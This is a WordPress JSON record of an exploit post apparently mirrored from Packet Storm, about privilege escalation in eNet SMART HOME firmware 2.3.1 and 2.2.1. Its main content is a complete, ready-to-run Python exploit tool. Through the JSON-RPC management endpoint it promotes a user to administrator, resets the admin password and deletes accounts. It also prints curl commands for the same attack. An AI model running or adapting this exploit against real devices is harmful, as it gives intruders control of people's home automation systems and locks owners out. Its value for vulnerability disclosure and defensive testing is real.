{"id":41403,"date":"2026-02-18T12:49:50","date_gmt":"2026-02-18T12:49:50","guid":{"rendered":"http:\/\/localhost\/?p=41403"},"modified":"2026-02-18T12:49:50","modified_gmt":"2026-02-18T12:49:50","slug":"enet-smart-home-231-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41403","title":{"rendered":"\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794"},"content":{"rendered":"

{“lastseen”:”2026-02-18T17:38:00″,”description”:”The eNet Smart Home device firmware versions 2.3.1 build 46841 and 2.2.1 build 46056 exposes JSON\u2011RPC management methods that may allow authenticated low\u2011privileged users to perform unauthorized administrative actions. Improper server\u2011side…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:215794″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : eNet SMART HOME \u2264 2.3.1 \/ 2.2.1 \u2013 Authenticated Privilege Escalation via JSON\u2011RPC Management Interface |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.enet-smarthome.com\/en\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : The eNet Smart Home device firmware (versions 2.3.1 build 46841 and 2.2.1 build 46056) exposes JSON\u2011RPC management methods that may allow authenticated low\u2011privileged users to perform unauthorized administrative actions.\\n Improper server\u2011side authorization controls on the \/jsonrpc\/management endpoint may enable privilege escalation via methods such as:\\n \\n setUserGroup\\n \\n resetUserPassword\\n \\n deleteUserAccount\\n \\n If role validation is insufficient, an authenticated standard user may escalate to administrative privileges by manipulating JSON\u2011RPC parameters.\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import json\\n import sys\\n import argparse\\n import random\\n from urllib3.exceptions import InsecureRequestWarning\\n from colorama import init, Fore, Style\\n \\n init(autoreset=True)\\n \\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\\n \\n class ENetSmartHomeExploit:\\n def __init__(self, target, port, protocol, icp, verbose=False):\\n \\”\\”\\”\\n Initialize the exploit class\\n \\n Args:\\n target (str): Target IP or hostname\\n port (str\/int): Target port\\n protocol (str): http or https\\n icp (str): ICP parameter from URL\\n verbose (bool): Verbose output\\n \\”\\”\\”\\n self.target = target\\n self.port = port\\n self.protocol = protocol\\n self.icp = icp\\n self.verbose = verbose\\n self.base_url = f\\”{protocol}:\/\/{target}:{port}\\”\\n self.session = requests.Session()\\n self.session.verify = False # Ignore SSL certificates\\n self.session.headers.update({\\n ‘Content-Type’: ‘application\/json; charset=utf-8’,\\n ‘Accept’: ‘application\/json, *\/*’,\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n })\\n \\n def print_banner(self):\\n \\”\\”\\”Print tool banner\\”\\”\\”\\n banner = f\\”\\”\\”\\n {Fore.CYAN}\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 \u2551\\n \u2551 {Fore.YELLOW}eNet SMART HOME – Privilege Escalation Exploit by indoushka {Fore.CYAN} \u2551\\n \u2551 {Fore.WHITE}ZSL-2026-5975 | Discovered by Gjoko ‘LiquidWorm’ Krstic{Fore.CYAN} \u2551\\n \u2551 {Fore.RED}Version: 2.3.1 (46841) and 2.2.1 (46056){Fore.CYAN} \u2551\\n \u2551 \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d{Style.RESET_ALL}\\n \\”\\”\\”\\n print(banner)\\n \\n def print_warnings(self):\\n \\”\\”\\”Print important warnings\\”\\”\\”\\n warnings = f\\”\\”\\”\\n {Fore.RED}\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 \u26a0\ufe0f indoushka \u26a0\ufe0f \u2551\\n \u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\\n \u2551 \u2022 This exploit requires a valid session cookie \u2551\\n \u2551 \u2022 You must be logged in as a regular user first \u2551\\n \u2551 \u2022 If server validates permissions, exploit will FAIL \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d{Style.RESET_ALL}\\n \\”\\”\\”\\n print(warnings)\\n \\n def login(self, username, password):\\n \\”\\”\\”\\n Login to get session cookie\\n \\n Args:\\n username (str): Username\\n password (str): Password\\n \\n Returns:\\n bool: True if login successful\\n \\”\\”\\”\\n print(f\\”{Fore.YELLOW}[*] Attempting login as {username}…\\”)\\n \\n url = f\\”{self.base_url}\/jsonrpc\/auth\\”\\n payload = {\\n \\”jsonrpc\\”: \\”2.0\\”,\\n \\”method\\”: \\”login\\”,\\n \\”params\\”: {\\n \\”userName\\”: username,\\n \\”password\\”: password\\n },\\n \\”id\\”: 1\\n }\\n \\n try:\\n response = self.session.post(url, json=payload, timeout=10)\\n \\n if response.status_code == 200:\\n data = response.json()\\n if \\”result\\” in data and data[\\”result\\”].get(\\”success\\”):\\n print(f\\”{Fore.GREEN}[+] Login successful!\\”)\\n if self.verbose:\\n print(f\\”{Fore.CYAN}[DEBUG] Cookies: {dict(self.session.cookies)}\\”)\\n return True\\n else:\\n print(f\\”{Fore.RED}[-] Login failed: Invalid credentials\\”)\\n if self.verbose:\\n print(f\\”{Fore.CYAN}[DEBUG] Response: {json.dumps(data, indent=2)}\\”)\\n else:\\n print(f\\”{Fore.RED}[-] Login failed: HTTP {response.status_code}\\”)\\n \\n except requests.exceptions.RequestException as e:\\n print(f\\”{Fore.RED}[-] Login error: {e}\\”)\\n \\n return False\\n \\n def execute_exploit(self, action, **kwargs):\\n \\”\\”\\”\\n Execute the exploit\\n \\n Args:\\n action (str): elevate, reset, delete, or test\\n **kwargs: Additional parameters based on action\\n \\n Returns:\\n dict: Response data\\n \\”\\”\\”\\n url = f\\”{self.base_url}\/jsonrpc\/management\\”\\n \\n if action == \\”elevate\\”:\\n method = \\”setUserGroup\\”\\n params = {\\n \\”userName\\”: kwargs.get(\\”username\\”, \\”zeroscience\\”),\\n \\”userGroup\\”: kwargs.get(\\”group\\”, \\”UG_ADMIN\\”)\\n }\\n elif action == \\”reset\\”:\\n method = \\”resetUserPassword\\”\\n params = {\\n \\”userName\\”: kwargs.get(\\”username\\”, \\”admin\\”),\\n \\”defaultPassword\\”: kwargs.get(\\”password\\”, \\”12345678\\”)\\n }\\n elif action == \\”delete\\”:\\n method = \\”deleteUserAccount\\”\\n params = {\\n \\”userName\\”: kwargs.get(\\”username\\”, \\”zeroscience\\”)\\n }\\n elif action == \\”test\\”:\\n method = kwargs.get(\\”test_type\\”, \\”getUserList\\”)\\n params = {}\\n else:\\n print(f\\”{Fore.RED}[-] Invalid action: {action}\\”)\\n return None\\n \\n request_id = random.randint(1, 9999)\\n \\n payload = {\\n \\”jsonrpc\\”: \\”2.0\\”,\\n \\”method\\”: method,\\n \\”params\\”: params,\\n \\”id\\”: request_id\\n }\\n \\n referer = f\\”{self.base_url}\/serverconfiguration.html?icp={self.icp}#Usermanagement\\”\\n self.session.headers.update({‘Referer’: referer})\\n \\n print(f\\”{Fore.YELLOW}[*] Executing: {method}\\”)\\n if self.verbose:\\n print(f\\”{Fore.CYAN}[DEBUG] URL: {url}\\”)\\n print(f\\”{Fore.CYAN}[DEBUG] Referer: {referer}\\”)\\n print(f\\”{Fore.CYAN}[DEBUG] Payload: {json.dumps(payload, indent=2)}\\”)\\n \\n try:\\n response = self.session.post(url, json=payload, timeout=10)\\n \\n if self.verbose:\\n print(f\\”{Fore.CYAN}[DEBUG] Response status: {response.status_code}\\”)\\n print(f\\”{Fore.CYAN}[DEBUG] Response headers: {dict(response.headers)}\\”)\\n \\n if response.status_code == 200:\\n data = response.json()\\n \\n if \\”error\\” in data:\\n print(f\\”{Fore.RED}[-] Server returned error:\\”)\\n print(json.dumps(data[\\”error\\”], indent=2))\\n \\n if data[\\”error\\”].get(\\”code\\”) == -32601:\\n print(f\\”{Fore.YELLOW}[!] Method not found – Target version may be different\\”)\\n elif \\”permission\\” in str(data[\\”error\\”]).lower():\\n print(f\\”{Fore.RED}[!] Permission denied – Server validates roles\\”)\\n elif \\”auth\\” in str(data[\\”error\\”]).lower():\\n print(f\\”{Fore.RED}[!] Authentication failed – Login required\\”)\\n \\n return data\\n else:\\n print(f\\”{Fore.GREEN}[+] Success!\\”)\\n print(json.dumps(data, indent=2))\\n \\n if action == \\”elevate\\” and params[\\”userGroup\\”] == \\”UG_ADMIN\\”:\\n print(f\\”{Fore.GREEN}[+] Privilege escalation completed!\\”)\\n print(f\\”{Fore.YELLOW}[!] User {params[‘userName’]} is now admin\\”)\\n elif action == \\”reset\\”:\\n print(f\\”{Fore.GREEN}[+] Password reset completed!\\”)\\n elif action == \\”delete\\”:\\n print(f\\”{Fore.GREEN}[+] User deleted successfully!\\”)\\n elif action == \\”test\\” and \\”result\\” in data:\\n print(f\\”{Fore.GREEN}[+] Test passed – Vulnerability may be present\\”)\\n \\n return data\\n else:\\n print(f\\”{Fore.RED}[-] HTTP Error: {response.status_code}\\”)\\n \\n if response.status_code == 401:\\n print(f\\”{Fore.RED}[!] Unauthorized – Login required first\\”)\\n elif response.status_code == 403:\\n print(f\\”{Fore.RED}[!] Forbidden – Insufficient permissions or CSRF token required\\”)\\n elif response.status_code == 404:\\n print(f\\”{Fore.RED}[!] Not Found – Check URL or endpoint\\”)\\n \\n if self.verbose:\\n print(f\\”{Fore.CYAN}[DEBUG] Response text: {response.text[:200]}\\”)\\n \\n except requests.exceptions.Timeout:\\n print(f\\”{Fore.RED}[-] Request timeout (10s) – Server not responding\\”)\\n except requests.exceptions.ConnectionError:\\n print(f\\”{Fore.RED}[-] Connection failed – Check target and port\\”)\\n except requests.exceptions.RequestException as e:\\n print(f\\”{Fore.RED}[-] Request error: {e}\\”)\\n \\n return None\\n \\n def get_session_info(self):\\n \\”\\”\\”Get current session information\\”\\”\\”\\n print(f\\”{Fore.YELLOW}[*] Session information:\\”)\\n print(f\\” Cookies: {dict(self.session.cookies)}\\”)\\n print(f\\” Headers: {dict(self.session.headers)}\\”)\\n \\n def generate_curl_command(self, action, **kwargs):\\n \\”\\”\\”\\n Generate curl command for manual testing\\n \\n Args:\\n action (str): Action type\\n **kwargs: Parameters for the action\\n \\”\\”\\”\\n if action == \\”elevate\\”:\\n method = \\”setUserGroup\\”\\n params = {\\n \\”userName\\”: kwargs.get(\\”username\\”, \\”zeroscience\\”),\\n \\”userGroup\\”: kwargs.get(\\”group\\”, \\”UG_ADMIN\\”)\\n }\\n elif action == \\”reset\\”:\\n method = \\”resetUserPassword\\”\\n params = {\\n \\”userName\\”: kwargs.get(\\”username\\”, \\”admin\\”),\\n \\”defaultPassword\\”: kwargs.get(\\”password\\”, \\”12345678\\”)\\n }\\n elif action == \\”delete\\”:\\n method = \\”deleteUserAccount\\”\\n params = {\\n \\”userName\\”: kwargs.get(\\”username\\”, \\”zeroscience\\”)\\n }\\n elif action == \\”test\\”:\\n method = kwargs.get(\\”test_type\\”, \\”getUserList\\”)\\n params = {}\\n else:\\n return None\\n \\n payload = {\\n \\”jsonrpc\\”: \\”2.0\\”,\\n \\”method\\”: method,\\n \\”params\\”: params,\\n \\”id\\”: random.randint(1, 9999)\\n }\\n \\n referer = f\\”{self.base_url}\/serverconfiguration.html?icp={self.icp}#Usermanagement\\”\\n \\n curl_cmd = f\\”\\”\\”\\n {Fore.CYAN}# ============================================\\n # RECOMMENDED METHOD – Command Line (No browser restrictions)\\n # ============================================\\n \\n # Step 1: Login and save cookies\\n curl -k -c cookies.txt -X POST \\”{self.base_url}\/jsonrpc\/auth\\” \\\\\\\\\\n -H \\”Content-Type: application\/json\\” \\\\\\\\\\n -d ‘{json.dumps({\\”jsonrpc\\”:\\”2.0\\”,\\”method\\”:\\”login\\”,\\”params\\”:{\\”userName\\”:\\”YOUR_USERNAME\\”,\\”password\\”:\\”YOUR_PASSWORD\\”},\\”id\\”:1})}’\\n \\n # Step 2: Execute exploit\\n curl -k -b cookies.txt -X POST \\”{self.base_url}\/jsonrpc\/management\\” \\\\\\\\\\n -H \\”Content-Type: application\/json\\” \\\\\\\\\\n -H \\”Referer: {referer}\\” \\\\\\\\\\n -d ‘{json.dumps(payload)}’\\n \\n # ============================================\\n # Notes:\\n # – Use -k to ignore SSL certificate errors\\n # – Cookies saved in cookies.txt\\n # – Replace YOUR_USERNAME\/YOUR_PASSWORD with actual credentials\\n # ============================================{Style.RESET_ALL}\\n \\”\\”\\”\\n print(curl_cmd)\\n \\n def main():\\n parser = argparse.ArgumentParser(\\n description=\\”eNet SMART HOME Privilege Escalation Exploit (ZSL-2026-5975)\\”,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=\\”\\”\\”\\n Examples:\\n python3 exploit.py -t 192.168.1.100 -p 443 –icp a1b2c3d4e5 –protocol https –action elevate -u zeroscience -g UG_ADMIN\\n python3 exploit.py -t 192.168.1.100 -p 80 –icp a1b2c3d4e5 –action reset -u admin –password 12345678\\n python3 exploit.py -t 192.168.1.100 -p 443 –icp a1b2c3d4e5 –action delete -u zeroscience\\n python3 exploit.py -t 192.168.1.100 -p 443 –icp a1b2c3d4e5 –action test –curl\\n \\”\\”\\”\\n )\\n \\n parser.add_argument(\\”-t\\”, \\”–target\\”, required=True, help=\\”Target IP or hostname\\”)\\n parser.add_argument(\\”-p\\”, \\”–port\\”, required=True, help=\\”Target port\\”)\\n parser.add_argument(\\”–protocol\\”, choices=[\\”http\\”, \\”https\\”], default=\\”https\\”, help=\\”Protocol (default: https)\\”)\\n parser.add_argument(\\”–icp\\”, required=True, help=\\”ICP parameter from URL (required)\\”)\\n parser.add_argument(\\”–action\\”, choices=[\\”elevate\\”, \\”reset\\”, \\”delete\\”, \\”test\\”], default=\\”test\\”, help=\\”Action to perform\\”)\\n parser.add_argument(\\”–login\\”, action=\\”store_true\\”, help=\\”Login first\\”)\\n parser.add_argument(\\”-U\\”, \\”–login-username\\”, default=\\”admin\\”, help=\\”Username for login\\”)\\n parser.add_argument(\\”-P\\”, \\”–login-password\\”, default=\\”12345678\\”, help=\\”Password for login\\”)\\n parser.add_argument(\\”-u\\”, \\”–username\\”, default=\\”zeroscience\\”, help=\\”Username for the action\\”)\\n parser.add_argument(\\”-g\\”, \\”–group\\”, choices=[\\”UG_USER\\”, \\”UG_ADMIN\\”], default=\\”UG_ADMIN\\”, help=\\”Target group for elevation\\”)\\n parser.add_argument(\\”–password\\”, default=\\”12345678\\”, help=\\”New password for reset action\\”)\\n parser.add_argument(\\”–test-type\\”, choices=[\\”getUserList\\”, \\”getSystemInfo\\”], default=\\”getUserList\\”, help=\\”Test type\\”)\\n parser.add_argument(\\”-v\\”, \\”–verbose\\”, action=\\”store_true\\”, help=\\”Verbose output\\”)\\n parser.add_argument(\\”–curl\\”, action=\\”store_true\\”, help=\\”Generate curl command only\\”)\\n parser.add_argument(\\”–no-warnings\\”, action=\\”store_true\\”, help=\\”Disable warnings\\”)\\n \\n args = parser.parse_args()\\n \\n exploit = ENetSmartHomeExploit(\\n target=args.target,\\n port=args.port,\\n protocol=args.protocol,\\n icp=args.icp,\\n verbose=args.verbose\\n )\\n \\n exploit.print_banner()\\n \\n if not args.no_warnings:\\n exploit.print_warnings()\\n if args.curl:\\n exploit.generate_curl_command(\\n action=args.action,\\n username=args.username,\\n group=args.group,\\n password=args.password,\\n test_type=args.test_type\\n )\\n sys.exit(0)\\n \\n if args.login:\\n if not exploit.login(args.login_username, args.login_password):\\n print(f\\”{Fore.RED}[-] Login failed. Exiting.\\”)\\n sys.exit(1)\\n else:\\n print(f\\”{Fore.YELLOW}[!] Warning: Not logging in. Make sure you have a valid session cookie.\\”)\\n print(f\\”{Fore.YELLOW}[!] Use –login to login first or –curl for manual testing.\\”)\\n if args.action == \\”elevate\\”:\\n exploit.execute_exploit(\\n action=\\”elevate\\”,\\n username=args.username,\\n group=args.group\\n )\\n elif args.action == \\”reset\\”:\\n exploit.execute_exploit(\\n action=\\”reset\\”,\\n username=args.username,\\n password=args.password\\n )\\n elif args.action == \\”delete\\”:\\n exploit.execute_exploit(\\n action=\\”delete\\”,\\n username=args.username\\n )\\n elif args.action == \\”test\\”:\\n exploit.execute_exploit(\\n action=\\”test\\”,\\n test_type=args.test_type\\n )\\n \\n if __name__ == \\”__main__\\”:\\n try:\\n main()\\n except KeyboardInterrupt:\\n print(f\\”\\\\n{Fore.YELLOW}[!] Interrupted by user\\”)\\n sys.exit(0)\\n except Exception as e:\\n print(f\\”{Fore.RED}[-] Unexpected error: {e}\\”)\\n sys.exit(1)\\n \\t\\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215794″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215794\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-18T17:38:00″,”description”:”The eNet Smart Home device firmware versions 2.3.1 build 46841 and 2.2.1 build 46056 exposes JSON\u2011RPC management methods that may allow authenticated low\u2011privileged users to…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41403","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41403\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-18T17:38:00″,”description”:”The eNet Smart Home device firmware versions 2.3.1 build 46841 and 2.2.1 build 46056 exposes JSON\u2011RPC management methods that may allow authenticated low\u2011privileged users to...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41403\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-18T12:49:50+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41403#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41403\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794\",\"datePublished\":\"2026-02-18T12:49:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41403\"},\"wordCount\":2178,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41403#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41403\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41403\",\"name\":\"\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-18T12:49:50+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41403#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41403\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41403#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41403","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794 - zero redgem","og_description":"{“lastseen”:”2026-02-18T17:38:00″,”description”:”The eNet Smart Home device firmware versions 2.3.1 build 46841 and 2.2.1 build 46056 exposes JSON\u2011RPC management methods that may allow authenticated low\u2011privileged users to...","og_url":"https:\/\/zero.redgem.net\/?p=41403","og_site_name":"zero redgem","article_published_time":"2026-02-18T12:49:50+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41403#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41403"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794","datePublished":"2026-02-18T12:49:50+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41403"},"wordCount":2178,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41403#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41403","url":"https:\/\/zero.redgem.net\/?p=41403","name":"\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-18T12:49:50+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41403#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41403"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41403#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 eNet SMART HOME 2.3.1 Privilege Escalation_PACKETSTORM:215794"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero 